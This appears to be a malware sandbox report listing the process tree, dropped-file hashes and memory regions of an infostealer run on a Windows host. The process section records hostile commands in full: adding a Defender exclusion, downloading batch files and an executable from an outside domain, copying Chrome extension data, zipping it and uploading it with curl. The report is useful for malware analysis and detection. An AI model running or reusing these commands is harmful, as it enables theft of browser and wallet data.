"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1d14ac5-2ae0-46c0-80a9-03b4a52df213} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2444 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cbc78e4-8af5-4fe4-aa5e-f44cb4af871f} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3004 -childID 1 -isForBrowser -prefsHandle 2648 -prefMapHandle 2980 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3c4bc19-b4de-42d2-bb9d-c61552719f82} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3792 -childID 2 -isForBrowser -prefsHandle 3784 -prefMapHandle 3780 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4eca05ad-b6dd-4af0-89e8-3c70b278bb7b} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4532 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4480 -prefMapHandle 4520 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4091d21a-8e19-41ef-bb46-5fab5a515c15} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4976 -childID 3 -isForBrowser -prefsHandle 4968 -prefMapHandle 4964 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e97cb531-2a79-42df-b006-c4e0a8ba0d4a} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5224 -childID 4 -isForBrowser -prefsHandle 5216 -prefMapHandle 5204 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e4edf6d-e616-46e8-bb0c-9f45ebd3ef4a} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5444 -childID 5 -isForBrowser -prefsHandle 5436 -prefMapHandle 5356 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 980 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6dc23d4-5f75-4137-94ae-963d5b0874fa} 4984 "\\.\pipe\gecko-crash-server-pipe.4984" tab

C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe

"C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe"

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\xcopy.exe

xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org

C:\Windows\SysWOW64\curl.exe

curl -s https://api.ipify.org

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Windows\SysWOW64\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Network


Files

memory/4776-0-0x0000000000C30000-0x00000000010F5000-memory.dmp

memory/4776-1-0x0000000077464000-0x0000000077466000-memory.dmp

memory/4776-2-0x0000000000C31000-0x0000000000C5F000-memory.dmp

memory/4776-3-0x0000000000C30000-0x00000000010F5000-memory.dmp

memory/4776-4-0x0000000000C30000-0x00000000010F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 cd86e4c2fbaf81cb17606d69108fff47
SHA1 97117dadf1a95214ceaf1d1d9337dae317c6a358
SHA256 458d36f8118c122fcd17e2ea1859282fd29e5f774ab7998787150c4f21ed360e
SHA512 42393ee97337b197a176032276b9da8bd3ba26d5e5a36751130271422a9cb0a91d50a22c9f75e4de77083b47d8b6c7f54c5f1ebccd09f97dbba8eb6591554748

memory/4776-15-0x0000000000C30000-0x00000000010F5000-memory.dmp

memory/2628-16-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-19-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-18-0x0000000000C81000-0x0000000000CAF000-memory.dmp

memory/2628-20-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-21-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-22-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/1992-24-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/1992-25-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/1992-26-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/1992-28-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-29-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-30-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2628-31-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

MD5 a67e34baacfca98f323981d3b0087f3b
SHA1 d22ccae2971df83812acaebc750d9a2c87357fe5
SHA256 6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706
SHA512 39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d

C:\Users\Admin\AppData\Local\Temp\Audit

MD5 9da23439e34b0498b82ae193c5a8f3a8
SHA1 ae20bbe7fac03c94e42f4dd206d89003faae7899
SHA256 0f241cc0324871a1a900a7ac0edf889a8d12875b1072f44856cc979a4b7a77ac
SHA512 cd4b262753b4f5f1dac09c20fa64ebdee00cf4a3fce92287a7439df943ea65bdf8569f541c2668b2164139b91facccfb3c98db8ad8f686637f4e317583cc98a2

C:\Users\Admin\AppData\Local\Temp\Commissioner

MD5 6ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1 f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA512 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0

C:\Users\Admin\AppData\Local\Temp\Dentists

MD5 895c5374a042a9e6c78c673690cd2275
SHA1 9dfe1b532f958f678de2bac7c74646e007a8fa14
SHA256 226099aac21e8d4a671a68b37d204339703fb696b6cc5aa30311fb55d6ab2147
SHA512 130af34bb1d12db8e86b930d8e490754687e1381a0104ac4c98cc2f02ff7fc4ed9e1d549121a013e1c32663a00d1dc8eb20d2f9831feb3c7eb17bf61a1d8d52c

C:\Users\Admin\AppData\Local\Temp\Flavor

MD5 d9182f7a263f19b9876e7e1568e6c760
SHA1 d0683b5a7247a2f4a69473165d2c2649f2e1c01f
SHA256 4efff79e94f136f9bbaed62501810937785831b8c10ee9eb675ceae24cf3c4c9
SHA512 85582b94da822580eb26bc477440d87fb0a9ed98e3b75166cd96c2a18c88367c8bdd808fc43c52c2078e625efd81983e9f2e733272289833700649ad58a96a9b

C:\Users\Admin\AppData\Local\Temp\Disturbed

MD5 0e2df9a4f4d78ad0299f0377d417b39e
SHA1 a2452ab3b04b480dfc2a58a416762e280254751f
SHA256 8834f63f09734b9f284437f26cba4909ce9ae1aceafa27e2bcd7531c1a7479df
SHA512 d8194f24cc02fc030c7cf1dab5970257a79b8bcc887a8ff1ccd104e94ea809dcd266b056c80e6a0e73cba71f81e654389025c939e3135f6fafca9d51737812b8

C:\Users\Admin\AppData\Local\Temp\Artistic

MD5 d35007cc8b2860b1fe9ee861e1f2846d
SHA1 58638fd185601506b3b13fe254065aeb7edff28c
SHA256 de1e4dbe18f0b926b49aceb10157bc7f542409bad6242422efef3b831608a037
SHA512 45f851201656cb19c89274d124a7625a4c9fe12f412616a84458aa1857c61455126264416ff7fa1c9ffa99b994613baecfacd1f8179240a5021c7e5b867ea068

C:\Users\Admin\AppData\Local\Temp\1012579001\d5faa09673.exe

MD5 623d073b8d01e00cbb5294ff07fe238a
SHA1 c3aeeb4de6cd38209944e7a1c3ecaa3f411f8775
SHA256 ce50862f51244b9dce6dbde2bc96fa852cff8ca84b720797894a3f43f4e293ca
SHA512 dc1fe9e39173bfd1e2722125b1385cf8c15e2570b65c1d5acb320a70d073d39a1a25f3665a87ccb3b8a0aaf7b7e63edb21e8e3cd4c3ac27e9cda237b54979824

C:\Users\Admin\AppData\Local\Temp\Justice

MD5 774df02c553d130dde3aa7496b64ebed
SHA1 e2a4aab8c3b654bd022662045fa70413a80e55f9
SHA256 ae9283c1a14b751639a75592295d85105954b761737ab77fc1e667a1498f2e9e
SHA512 c132cdf383e4fa32362d50768898ed9c6cd1e306056d066168a8ac1ee3ea7953424ff3b241ff1e0376b99b91f566b698bfef07da9bc45471097a6637dc154d11

C:\Users\Admin\AppData\Local\Temp\Proceeds

MD5 de061b898e12d89c92409f220918347f
SHA1 6b571edab30dcc4d5518e5bebb296d1f7bf5414c
SHA256 70fda66f3ea2607d6cff63d0a6a7258577690d2a9bc5105bb529889ce025d1c2
SHA512 61d94f04572643dc4274aedda51e7cb6bcccefcfa4556e6d87f94195ddf90ffbeb65909688c7bc3407f244021cc6dff0c8692fd7835ee61e6a43a0394a693a2b

C:\Users\Admin\AppData\Local\Temp\Zip

MD5 84f05dddefb1c72567827be553fe67fe
SHA1 c2ebcc4de3439a8206aa8faac90312bfb207ce4f
SHA256 b7de8d92196f323eb9a6237b9e902461569fd093b36e1988dee9de2ab157bb12
SHA512 99954fa07fe7cc0e54dbd0af09b32507cd998c8b44cb63f1ffe8e30667b6d1bb0949a6c95b60e40e73f0b0bb3f11e79f8fa23f696032118210cd10f03eec2904

C:\Users\Admin\AppData\Local\Temp\Soundtrack

MD5 b75737c804ca9949cc63bd42c945a5e6
SHA1 75c0490174adc40d1824b1024021b82dd5c762b7
SHA256 628068ee856d68776d6e9b755cd42d7a5a46af1a2a6a2c22e65db95b5d2d8f2c
SHA512 58fedd2bd6318d4b93de429d184701e059321c16872cafc978837c29985404bf432e4a2701894f7f67045f9684da40c8e14f9f557da3398c5d6eeca2e18faca7

C:\Users\Admin\AppData\Local\Temp\Revenue

MD5 aabc90b85b9c3b51543de0339d29778e
SHA1 299f5e2ca9326e0a5feefb4fc7b05da93cfd11a1
SHA256 9a0a3567f4c9b9ca46fbf41d65cdd5ce464b0efe42d6aaf7cff840addbe05d60
SHA512 3d951489d7d46874909bfd82e9cac346bdd15bbb485fc76e1ed7d6fe7bb51a7649d1f649b75bb6f6f1b6f10ea16113cd01c20aa7ea85d038fcb7fe317082edf3

memory/116-390-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\491505\B

MD5 0a1e63fc10dd1dbb8b2db81e2388bf99
SHA1 67ad39aabbf4875bc1b165ccd5afc40194d1d3c8
SHA256 122991768f589431b9166a4e22523bf48a53efff73fc2b191955e604196541b7
SHA512 94c50f06e1d157381b9d0746044b5d015e2946b44291d92739783cb3ed9e91371cf7d1b981d3108d910d7a7000810fe69fbe6590f9a84f822b671866ab9db5fc

memory/2628-426-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012580001\32dac93b2c.exe

MD5 d124690a731b9f9511d39dda3a5ef3d8
SHA1 26fc68f194903e93db04711c9524c442845b583c
SHA256 47cb2f5b689678b3292f548d7346c6b400dedc6a2b1dde54b2e343b8b5fc2775
SHA512 e936a771891f85dca11f607acaae7780e9b11eb7ae7afcbc6273ce2386f1d9739c2db55b45c5a8fb4de2af84636e7610cfba096d0a26ab7c31d25176dcf22634

memory/3024-443-0x0000000000B40000-0x0000000000FCC000-memory.dmp

memory/116-447-0x0000000010000000-0x000000001001C000-memory.dmp

memory/116-451-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/116-452-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2628-454-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/3024-455-0x0000000000B40000-0x0000000000FCC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FMGLWGAG\download[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/3024-465-0x0000000000B40000-0x0000000000FCC000-memory.dmp

memory/116-467-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012581001\dc0bfa7b6f.exe

MD5 343a771efad9c921a3abb8d4201f6040
SHA1 b142b17a0dfb82b75071950eba743d0150ad12ff
SHA256 6d08fa0a96bed6936121d80a60807e6682f0e1ce65f4fca2006fffcf109aa85e
SHA512 d0ebd4de115ae62ea6d7aee7e636f767fe8823b09a0beb22bf64805ea4f01034b7b89092fe0083d9bc694fea3fe2d457aeadff49b4a17c81bc099861620c91e2

memory/2848-483-0x00000000003C0000-0x00000000008BF000-memory.dmp

memory/2628-484-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2848-486-0x00000000003C0000-0x00000000008BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1012582001\35d9f5c14a.exe

MD5 8746d7ddcd593e7a9a38016b27a6dde0
SHA1 a505737a7bebefbd81d28d729e26187d15ea3aa7
SHA256 159e04da0b72590135477fa37369439acc2dd400ba28af7597ab05f0be906280
SHA512 9d2c4372c85f2f176f5034c4eb54ba1290260b69cd760fb17e7f3a54ecb490290fa033716f2019231c50b321d314e36b5d6003253e176be8d250cbe689e45b52

memory/4712-506-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/4712-508-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\1893ebdd-c37c-49ea-88ef-397a579259ce

MD5 a83a421bfaff4de9dd5b7109cfc5a59d
SHA1 08b5babe78873d1b6a5596477061b06733574e1d
SHA256 3a1991fd7e982bb84eb5803da0edf0cb778298ba9aabb3302e33eb6d15e51382
SHA512 2c3380389514ee7ab48c21f20fe47228ca732cfe3e4388843fe72c8d2b2ef58ec0257224af13bf5f4e89a35bb7d3edfadcc93cfc90415b56a6262e5bcd8667d8

memory/116-522-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\927352d2-508a-43c9-8399-e7bc43dbd7e0

MD5 3d1ec2e6b2c3325970ce74d4af0ad8af
SHA1 10ea3c36923320814064e29f0fdd16f9fbd43fc1
SHA256 43d672cb8479869712ef05ccf415288f79b30ee18e4b1272e9ca3c7b586234a9
SHA512 54fee84629de14af0d67529a27dd9857e284cbdaa64e4cdd143ebea081fd7b713f0f46dc87ea08af1ae165e94069f557980082f681554ec6fc20fbc446b235c5

C:\Users\Admin\AppData\Local\Temp\1012583001\a99fc41bfc.exe

MD5 fc6804a55358a117689dab9333fd0ee5
SHA1 bbe4309bc6d99a67ecc0e866907889659d8e7031
SHA256 4decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58
SHA512 6a7b08a022cb25bfa0f906ba50a322bf3a7333e28d083d73c848d220789530f6ad31a65c0b7baf062c3cb5be30128a9af0d3fb43ea714f72f7b1b7bcf622271c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

MD5 9f7f12ec25148444dd125adb02b101cf
SHA1 da1054be41977d4b478c36791a1421c36f68e285
SHA256 2a43fef652a07eb5e3aaea994893971ed949ae48f0e3276ecd21e467ed4fcfa8
SHA512 d9497c53c5b7f7453decc1a806a9378265695aa25bc8ff71dc7cf0c3e0a70e75b6c060f1f151e5d7ff17a62d8a66a87778e9e5fe1d32e2dc17cfeea50336c2e5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

MD5 5059ca903a97a0df9b6ff1ba2c7355e2
SHA1 0315f1e5af034a55a43c555a2f694d02a9f83311
SHA256 acceeafb90fed3adc9c3752847c6a7b361e6cd38a9570c73bc92be808b93fb12
SHA512 afeb543152a03cf375daa85ae6020649034b47b1be5855a5f78ed5369744228cde5156d5440bbf0a3252a3860f11f0492879781b823d230666f7cd3b4a55c0bf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

MD5 a9c7795a032679a0e9fda19ee6a7d297
SHA1 9d116d68957ba83f00c10234e64f8dfeaf1a916a
SHA256 83ed6a02a9d6d788322e4c04aa2e334da36b4789198c1306e61cffdebbd4380c
SHA512 bba521f15fd0735543b30077eb9555b3123bc4cb2384cfae66c95402b08d5aed9fdf905e707fbb9eb7b2bb370c38acb5dd4267c5a159d75e94bb65e3abe110f6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

MD5 26fae3f37c08ead4ce92ce32db3bc0f2
SHA1 f450fa6b71ff3e5920d670bd87b70bedb6791a23
SHA256 f3d9fc18f3e4d628e8c2c1e4058723005727b08f10ee5224d9c9bdb6f901ecf7
SHA512 24c9983c1909ef9d0a5c8e6a2ffc72bd1bb513d9aaa4793eae7e75a20ab53dead916ab9c74c2d803770f3a7933826f0c59ab3715fe176f42cb7d6ec974ee70b6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

MD5 8c26b3909504042a8a6c262e66ea7c1f
SHA1 1f1acc55feec44dabac15a42d69a9920d105008f
SHA256 c134db85181a78611ffddef35cdb37fb20a077ffa2ff5cd48ad0765bb66e9b48
SHA512 c5677e5b88a89f6165acbe171b9c9203976afc045b23c31bbe99fba900fdbafb3dab3820570456b4af4f7cce683a3d716d736f8af2bdf7a0cf0a17f1a6c0f0bc

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\activity-stream.discovery_stream.json

MD5 08bacd04ef0a5559a6cfcc9e24d904df
SHA1 e867b42a0ae3f10003872bbd41bd747d30ff2856
SHA256 1e2c1c8e218e8568ddec62264594079a5ed876d5d407051189400c67a5029163
SHA512 c20eefcaacd2ad9f2a77d6fba55fac4544e72807163cc4f1b79b0917a6e1c71db17c4b50068bbc86e85ca8deb26da7f8cbe07f4cdd546aeba6077e6ea46d13aa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs.js

MD5 d7107a4051dcbb5f7373b7e4b9c1b562
SHA1 aa64399a3f570d01b5f67bf12e210d75718f05d2
SHA256 d3dd6c8603e3a5697eefde03a54a8d8cb84a264d686c0d86c8fadedb20daadc8
SHA512 12bbb40803275f85846377c727bb86e596c096194b9dd1c128d5f2153a875c4bfece235e9a8edf07596866d8cb30f7718d3a147f641c0a895380d372c4208dc3

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

memory/2628-839-0x0000000000C80000-0x0000000001145000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

MD5 6ea39011afddc0e92f60040daf0edbb9
SHA1 a9b0e2e5e5d65bfad85d6e4608c390ce669bc39a
SHA256 4b8f2250f588054ba486f659afc3307e42e2d039aaa12daccc637de2f35085af
SHA512 8e9e7a5e2fcd381af9d451a2187ccc8b36b9e947dad5b427b8c99c26205407f86f785986095124f6ce6fadd23fb4107164b888844277add41d6f259b9214aaa6

memory/1156-899-0x0000000000F80000-0x0000000001228000-memory.dmp

memory/1156-907-0x0000000000F80000-0x0000000001228000-memory.dmp

memory/1156-908-0x0000000000F80000-0x0000000001228000-memory.dmp

memory/116-921-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/2628-928-0x0000000000C80000-0x0000000001145000-memory.dmp

memory/2544-929-0x0000000000700000-0x0000000000B04000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

MD5 0d5df43af2916f47d00c1573797c1a13
SHA1 230ab5559e806574d26b4c20847c368ed55483b0
SHA256 c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512 f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

memory/2544-932-0x0000000000F70000-0x0000000000F7E000-memory.dmp

memory/2544-933-0x0000000005200000-0x000000000525C000-memory.dmp

memory/2544-934-0x00000000058D0000-0x0000000005E74000-memory.dmp

memory/2544-935-0x00000000053C0000-0x0000000005452000-memory.dmp

memory/2544-936-0x0000000005370000-0x0000000005382000-memory.dmp

memory/2544-937-0x0000000005380000-0x0000000005388000-memory.dmp

memory/2544-938-0x00000000053A0000-0x00000000053A8000-memory.dmp

memory/2544-939-0x00000000053B0000-0x00000000053B8000-memory.dmp

memory/2544-940-0x0000000005860000-0x0000000005878000-memory.dmp

memory/2544-941-0x0000000005FC0000-0x0000000005FD0000-memory.dmp

memory/2544-942-0x0000000006600000-0x0000000006C28000-memory.dmp

memory/1156-944-0x0000000000F80000-0x0000000001228000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bd3zzi1u.f1z.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2544-954-0x0000000006560000-0x000000000657A000-memory.dmp

memory/2544-955-0x00000000065C0000-0x00000000065F6000-memory.dmp

memory/2544-956-0x00000000074B0000-0x0000000007B2A000-memory.dmp

memory/2544-957-0x0000000006ED0000-0x0000000006F66000-memory.dmp

memory/2544-958-0x0000000007220000-0x0000000007242000-memory.dmp

memory/2544-960-0x0000000007250000-0x000000000726E000-memory.dmp

memory/2544-961-0x0000000007330000-0x000000000737A000-memory.dmp

memory/2544-959-0x00000000072C0000-0x0000000007326000-memory.dmp

memory/2544-962-0x0000000007C30000-0x0000000007F84000-memory.dmp

memory/2544-963-0x0000000008050000-0x00000000080B6000-memory.dmp

memory/2544-964-0x00000000082F0000-0x0000000008312000-memory.dmp

memory/2544-966-0x0000000008440000-0x000000000848C000-memory.dmp

memory/1156-968-0x0000000000F80000-0x0000000001228000-memory.dmp

memory/2544-978-0x0000000009750000-0x000000000976E000-memory.dmp

memory/2544-979-0x0000000009770000-0x0000000009813000-memory.dmp

memory/2544-980-0x00000000098A0000-0x00000000098AA000-memory.dmp

memory/2544-981-0x0000000009B50000-0x0000000009B61000-memory.dmp

memory/2544-982-0x0000000009B70000-0x0000000009B7E000-memory.dmp

memory/2544-983-0x0000000009B90000-0x0000000009BA4000-memory.dmp

memory/2544-984-0x0000000009BD0000-0x0000000009BEA000-memory.dmp

memory/2544-985-0x0000000009BF0000-0x0000000009BF8000-memory.dmp

memory/2544-986-0x0000000008610000-0x000000000861A000-memory.dmp

memory/2544-991-0x0000000009BC0000-0x000000000A1D8000-memory.dmp

memory/2544-992-0x0000000008690000-0x00000000086A2000-memory.dmp

memory/2544-993-0x0000000008730000-0x000000000876C000-memory.dmp

memory/2544-994-0x0000000008880000-0x000000000898A000-memory.dmp

memory/2544-995-0x0000000008B60000-0x0000000008D22000-memory.dmp

memory/116-996-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

MD5 654c9a9b90be52cb9d0ae0c13e06712f
SHA1 9ddf4f3ae680e0b3f2b84ed4d9eb701537539cfc
SHA256 ee0cc48a6742674ab454e990d240b7ed38cbed41775e56df8c45076b0ca4b537
